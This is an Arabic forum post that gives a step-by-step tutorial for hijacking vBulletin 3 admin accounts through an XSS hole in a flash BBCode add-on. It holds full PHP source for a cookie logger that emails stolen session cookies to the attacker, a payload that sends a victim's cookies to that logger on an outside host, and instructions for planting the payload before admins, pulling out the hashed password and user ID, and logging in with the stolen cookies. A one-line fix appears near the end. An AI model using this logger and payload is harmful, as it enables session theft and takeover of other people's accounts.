captintupac باشا Admin
عدد المساهمات : 298 يا جامد معاك نقاط : 2306 تاريخ التسجيل : 17/07/2010 العمر : 35
| موضوع: شرح اختراق المنتدياتvb3 بإحدى ثغرات الصندوق السحري والماسي السبت يونيو 18, 2011 10:21 pm | |
| بسم الله الرحمن الرحيم
والصلاة والسلام على أشرف خــلق الله سيدنا وحبيبنا محمد وعلى آله وصحبه أجمعين.. وبعد...
يشرفني بأني اشرح اقوى ثغرات المنتديات من نوع فيبولتين vb المعروفه والجميله جدا ويتميز هذا النوع من المنتديات بسهوله استعماله وكثرت الهاكات التي تركب به الجميله جدا
ومن اجمل الهاكات هو الصندوق السحري و الماسي ولكن مافي شئ كـامل الا الله سبحان وتعالى
وفي هذا النصدوق السحري يوجد ثلاث ثغرات وهم:- ثغره الفلاش ثغره الريل بلاير ثغره تنسيق القصيده
وهم من نوع xss
نبدأ الشرح ولكـن قبـل لا ابدأ الشرح يــاليت تقرأ هذه العباره:-
" أقســم باللــه أني ما أستخدم الثغره على المنتديات العربيه والاسلاميه"
اللهم قد بلغت اللهم فشهد اللهم قد بلغت اللهم فشهد اللهم قد بلغت اللهم فشهد
بسم الله نبدأ
مذا تحتاج الثغره:-
لوجو مبرمج بلغه الـ php واخوانا ديفل مبرمج php ماقصر سوالنا لوج قوي جدا
كود PHP:
<?php /* S4aLog v1.0 [ Beta ] ----------------------- **Beta Of S4aLog v1.0 With Str_Repalce <;> ! You Can Get ******* And Refresh The Broweser ! v0.10 [ New New New ] !Named Your Attack With $nm e.x [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] [ MSG ] Name : Attack1 ******* : ******* Refresh : [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] [ MSG ]! ! Get ******* Like This :: bbpassword[000000] bbhash[0000] || Old bbpassword=12121; bbhash=12121; ! [ New New New ] */ $YourMail = " -"; // Your E-mail /*-----------------------*/ $Ip = $REMOTE_ADDR; $Cooki_e = $_GET['id']; $NameOfAttack = $_GET['nm']; $Refresh = $_GET['re']; /* Start */ $Replace******1 = array("=",";"); $Replace******2 = array("[ "," ] "); $Cooki_e = str_replace($Replace******1,$Replace******2,$Cooki_e); // Replace /* e.x hash=0210; | hash[0210]*/ //***************************************// $Hdr = "From: S4aLog <log- -->"; $Msg = " Mr Attacker ,,, S4aLog v1 Beta << [ ".$NameOfAttack." ] ,, Name Of Attack [ ".$Refresh." ] ,, Refresh Page [ ".$Ip." ] ,, Ip [ S4aLog < By Devil-00 > -- Thnx For -- <System Evil> <xxx (hacker)> <s4a Members> ] [ - - ] ----------------------------------------------- ****** :: ".$Cooki_e." "; /* ------------------------------------------------------------------------- */ $Send = mail($YourMail,"S4aLog -- NewLog",$Msg,$Hdr); /************************************************** ***************************/ if($Send){ if($Refresh <> ""){header("location:".$Refresh);} } ?>
اعمل التغييرات الاتيه:-
YourMail = " -**************@hotmail.com -"; // Your E-mail
وضع اميلك بداله
والتغيير الثاني هو كلمه C o o k i e وهي تخرج على هيئئه 6 نجوم ****** غيرها وضع كلمه C o o k i e ولكن ازل المسافات بين الاحرف لكي تكون كلمه واحده بدون مسافات
لكي يكتمل اللوج عندنا
وبعد التعديل اعمل على المفكره عندما تنسخ كود اللوج واحفظه بأسم log وغير الامتداد الى php
وارفع اللوج على موقعك الشخصي او اي موقع يقبل php
والحين نجرب مع بعض على طريقه استغلال الثغره وراج اجرب على ثغره الفلاش لانها الاسهل على المبتدئين
هذا كود الثغره
كود PHP:
[flash=http://www.xxxxxx.com/test.swf]onmouseover='alert(****************);'[/flash]
والان نأتي بربط كود الثغره بملف فلاشي لكي نخدع به صاحب المنتدى او اي مشرف من المشرفين
والربط بيكون على الشكل التالي:-
كود PHP:
[flash=http://www.xxxx.com/card/x/swf/n.swf]onmouseover='location.href="http://www.xxx.com/log.php?nm=al-battar.net&re=http://www.xxxx.com/vb/showthread.php?t=1245&id="+****************'[/flash
والحين يا شطار ندخل في المتغيرات:_
اولاً:- [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] نغيره الى اي ملف فلاشي وينصح بملف صغير الحجم لكي لا تنكشف ويتخرب شغلك
ثانياً:- [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] هنا غير الرابط هذا برابط اللوج الذي رفعته على موقعك
بعد عمليه التعديل
ثالثاً:- [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
هذا ياشباب مهم يعني مثلا اى واحد يمر المآوس قدام الفلاش راح يودييه للصفحه الموجوده بالكود وانا انصحك تحط يرجع لنفس الصفحه الموجود فيها الفلاش عشان لا يشك الضحيه ونشكر اخونا ديفيل لان طور اللوجو لان اول لوجو لامريت المآوس يوديك لصفحه بيضه
يعني نغير الرابط هذا الى اي رابط موضوع وينصح برابط الموضوع نفسه
وجزاه الله خير دع الخياار لناااا الله يوفقه في الوجو الجديد ( المطور )
ملإحظه ( إكيد بعضكم يبي يقول شلؤن اعرف انه هذا الكوكيز لاى منتدى )
اجابة السؤال ( الخيآر الثالث بالكوكيز وهى الصفحه المراد الذهاب لها بعد مررو مآوس الضحيه امام الفلاش
راح تجيك داخل الرساله وجذى تعرف لاى منتدى هذا الكوكيز )
الحين هذى شكل الرساله اللى راح توصلك ( بهذا الشكل )
****** :: bbsessionhash[ 6b0edfdfsfd3ffbe27bc928936aba42f3523efa ] bblastvisit[ 1119817asd013 ] bblastactivity[ 11198as17959 ] bbforum_view[ 3523e417e8fb0bc834d2abaf8f9eb54cax1x-ix2yix1119817237y_ ] bbthread_lastview[ cf56fed12e97ac29c33812245fe8e28aax1x-ix1985ysx10x\"1111907592\"y_ ] bbuserid[ 6224 ] bbpassword[ 9360b6686129d3d676df4e6974e8f730
المهم بالرساله كله التالى
bbpassword bbuserid bblastactivity bblastvisit
واكيد لازم تكون مسجل بالمنتدى اللى ودك تدخل بنك الادمن فيه
الحين نطلع اللى نبيه من الكوكيز اللى وصل لنا بالإيميل
الباسوورد المشفر bbpassword 9360b6686129d3d676df4e6974e8f730
رقم العضويه bbuserid 1
bblastactivity 1119817959
bblastvisit 1119817013
الآن إفتح برنامج الكوكيز
والان بعد ما استهدفنا الادمن الي نبي ندش بعضويته وصلنا معلومات الكوكيز على الاميل
وبعد ما حملنا البرنامج محرر الكوكيز نفتح ونغير المعلومات الي معلومات التي وصلتلنا على الاميل
ملاحظه ( bb مو بكل المنتديات تبدآ بكل كلمه مثلا منتديات تبدآ بـ rr شيء عـآدى )
والآن بعد التعديل إغلق البرنامج واذهب للمتصفح واذهب للمنتدى سوف ترى انك
اصبحت ادمن كماا بالصوووره
تمت التجربه على عده منتدياات بنجااااح
والثغره لازالت شغاله واستغلالهاا سهل مثل ماتشووفوون
الترقيع
كلمة C o o k i e مع مراعات حذف المسافات بين الحروف اجعلها من ظمن الكلمات الممنوعة طبعا لاتنسى التفعيل وخلاص الحين تقفلت الثغرة
ولكم خالص تحيه
لا تـنسونا بالدعــاء
وانتظروا الجديد دائما على منتديات الشباب الاحترافيه والافضل بإذن الله قريب
والثغره إهداء الى كل من يكره العدو
اهداء الى قلب الافعه ومشرفين منتدى الشباب الاحترافيه والاداريين واعضائها
وتم اغلاق هذه الثغره من منتديات الشباب الاحترافيه ولله الحمد واي شئ تطور ابلغكم انشالله تقبلو تحياتي
اخوكم:-توباك باشا (captintupac) | |
|
شلاقه باشا جديد
عدد المساهمات : 8 يا جامد معاك نقاط : 10 تاريخ التسجيل : 11/06/2011
| موضوع: بارمك الله فيك وضح اكتر الخميس يونيو 23, 2011 1:40 pm | |
| والله مافهمت اى شى الكود بضعوا وين وكيف هتكون البدايه[b] | |
|